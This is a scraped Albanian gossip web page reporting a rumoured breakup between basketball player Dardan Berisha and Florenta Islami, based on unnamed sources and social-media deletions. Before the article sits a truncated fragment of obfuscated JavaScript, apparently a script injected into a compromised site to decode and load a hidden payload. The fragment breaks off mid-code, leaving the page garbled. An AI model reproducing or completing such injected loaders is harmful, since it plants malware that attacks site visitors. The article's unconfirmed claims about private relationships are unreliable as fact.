;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Lajm i keq! Çifti i njohur i jep fund lidhjes?! (FOTO)

By

2017-ta rezultoi një vit produktiv në shoubizin shqiptar sa i përket çifteve.

Shumë prej figurave publike gjetën dashurinë, të tjerë vendosën ta kurorëzojnë atë kurse nuk munguan as ribashkimet.

Megjithatë, edhe ndarjet janë të pashmangshme.

Fatkeqsisht, një e tillë dyshohet të jetë ajo e basketbollistit Dardan Berisha dhe bukuroshes nga Prishtina, Florenta Islami.

Burime të Prive.al pranë dyshes kanë konfirmuar faktin se ata në dy-tre javët e fundit nuk janë parë nën shoqërinë e njëri-tjetrit në kryeqytet.

Marrëdhënia e tendosur është reflektuar edhe në rrjete sociale.

Florenta ka mbyllur llogarinë e saj me shumë ndjekës për të hapur një të re private pa Dardanin në listën  e ngushtë të miqve teksa ky i fundit, i cili ka pak kohë që është rikthyer nga Italia ku luajti për ekipin ‘Juvecaserta’ ka fshirë të gjitha fotografitë me bukuroshen.

Çifti shpesh zënë vend në media për ndarje të mundshme megjithatë indikacionet nuk kanë qenë asnjëherë më serioze se tani.

Kujtojmë se paraqitja e fundit e përbashkët për Florentën dhe Dardanin ishte me 11 Korrik nga Rugova. Shpresojmë që të bëhet fjalë për një krisje momentale dhe jo përfundimtare për çiftin. /prive.al/

 

Artikuj të ngjashëm